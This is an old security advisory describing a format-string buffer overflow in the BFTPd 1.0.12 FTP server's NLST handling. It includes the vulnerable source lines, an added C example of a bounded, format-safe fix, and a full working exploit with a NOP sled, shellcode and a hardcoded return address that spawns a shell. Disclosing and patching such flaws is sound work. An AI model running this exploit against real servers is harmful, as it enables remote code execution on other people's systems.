
Title: Malformed vsprintf in BFTPd allows execution of arbitrary code
Released by: asynchro
Date: 7th December 2000

------------------------------------------------------------------------





SUMMARY

BFTPd <http://c.codercity.de/bruksoft/> is a Linux FTP server with chroot
and setreuid functionality. The current version, 1.0.12, has a security
problem in its handling of the NLST command: when a directory entry whose
name contains printf-style conversion directives is listed, the name is
handed to vsprintf() as the format string instead of as an argument. A
remote attacker who can create such a file on the server can overflow the
fixed-size output buffer and execute arbitrary code.



DETAILS

Vulnerable systems:

BFTPd 1.0.12

sendstrf() formats its output with vsprintf() into a fixed-size buffer, so
nothing bounds the number of bytes written:

int sendstrf(int s, char *format, ...) {
   ....
   vsprintf(buffer, format, val);

When sendstrf() is called from the NLST handler, the directory entry name is
passed as the format argument rather than as a parameter to a fixed "%s"
format:

   else {
     foo = 1;
     sendstrf(s, entry->d_name);
   }

Any "%" directive in the file name is therefore interpreted by vsprintf(). A
directive with a large precision or field width (the exploit below uses
%.260x) expands a six-byte name into hundreds of bytes of output, overflowing
the buffer in sendstrf() and overwriting the saved return address behind it
with an attacker-chosen value. Anyone who can create a file with such a name
in a directory the server will list can thus execute arbitrary code.
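The following is an added example, not bftpd's own code, that puts the two defects side by side: the unbounded vsprintf() call and the untrusted format string. format_reply() and nlst_line() are hypothetical names for a bounded replacement of sendstrf() and a corrected NLST line; the 64-byte reply buffer is an assumption chosen so the effect is visible, since the advisory does not give the real buffer size. The exploit's file name "%.260x" is written as a literal where it is used as a format so that the demonstration itself is well defined.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Reply buffer for the demo. 64 bytes is an assumption; the advisory does
 * not state how large the buffer in sendstrf() is. */
static char reply[64];

/* Bounded replacement for sendstrf() (hypothetical name): formats with
 * vsnprintf() into a caller-supplied buffer and returns -1 instead of
 * sending a truncated line. The format must be a literal the program
 * controls; attacker data only ever travels through the arguments. */
int format_reply(char *out, size_t outsz, const char *fmt, ...) {
    va_list ap;
    int n;

    va_start(ap, fmt);
    n = vsnprintf(out, outsz, fmt, ap);
    va_end(ap);
    if (n < 0 || (size_t)n >= outsz)
        return -1;  /* this is where the old vsprintf() would have overflowed */
    return n;
}

/* Corrected NLST line (hypothetical name): the entry name is the argument
 * to "%s", so a '%' in the name is just a character. */
int nlst_line(char *out, size_t outsz, const char *d_name) {
    return format_reply(out, outsz, "%s", d_name);
}

/* Bytes vsprintf() emits for the exploit's name when the name is used as
 * the format. In the vulnerable server this string comes from readdir();
 * here it is a literal so the call is well defined. */
int exploit_name_expanded_len(void) {
    return snprintf(NULL, 0, "%.260x", 0);  /* 260 */
}

/* The same name passed correctly as a "%s" argument: output is strlen(). */
int exploit_name_literal_len(void) {
    return snprintf(NULL, 0, "%s", "%.260x");  /* 6 */
}

/* Audit helper: a directory entry containing '%' only matters if it is
 * ever used as a format string, but flagging such names makes a vulnerable
 * listing code path easy to spot in testing. */
int name_has_directive(const char *d_name) {
    return strchr(d_name, '%') != NULL;
}

int main(void) {
    printf("name as format: %d bytes, name as %%s argument: %d bytes\n",
           exploit_name_expanded_len(), exploit_name_literal_len());

    /* Fixed code: the hostile name is copied verbatim, 6 bytes. */
    printf("nlst_line: %d -> \"%s\"\n",
           nlst_line(reply, sizeof reply, "%.260x"), reply);

    /* Old code's choice with a bounded call: 260 bytes do not fit in 64,
     * so the bounded version refuses instead of smashing the stack. */
    printf("format_reply with name as format: %d\n",
           format_reply(reply, sizeof reply, "%.260x", 0));
    return 0;
}
```

The two changes are independent and both are needed: vsnprintf() alone would still let a "%n" or "%s" directive in a file name read or write memory through the variadic arguments, and a fixed "%s" format alone would still let a very long name overflow an unbounded vsprintf().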



Exploit:

/*
Creates a filename that exploits the bug in bftpd 1.0.12.
Create the file, cwd into the shell directory and NLST the directory that
holds the file (sh is executed in the working directory because it is not
possible to insert a / in the filename).

hints by |CyRaX| & Cthulhu
coded by asynchro

www.pkcrew.org
*/

#include <stdlib.h>
#include <string.h>

#define BUFSIZE 512
#define NOP 124

int main(void)
{
  int i;
  char *buff;
  char nop = 0x90;
  /* return address pointing into the NOP sled; stack address on the author's system */
  char addr[] = "\xd4\xf9\xff\xbf";
  /* %.260x makes vsprintf() emit 260 bytes of padding before the address */
  char command[] = "touch %.260x";
  /* execve("sh", ...) followed by exit(); "sh" is resolved relative to the cwd */
  char shellcode[] =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xffsh";

  buff = (char *) malloc(BUFSIZE);
  memset(buff, 0x0, BUFSIZE);
  memcpy(buff, command, sizeof(command));

  /* two copies of the return address, then the NOP sled, then the shellcode */
  strncat(buff, addr, 4);
  strncat(buff, addr, 4);

  for (i = 0; i < NOP; i++) {
    strncat(buff, &nop, 1);
  }

  strncat(buff, shellcode, strlen(shellcode));
  system(buff);
  return 0;
}





ADDITIONAL INFORMATION

The information has been provided by asynchro.

(C) 1999-2000 All rights reserved.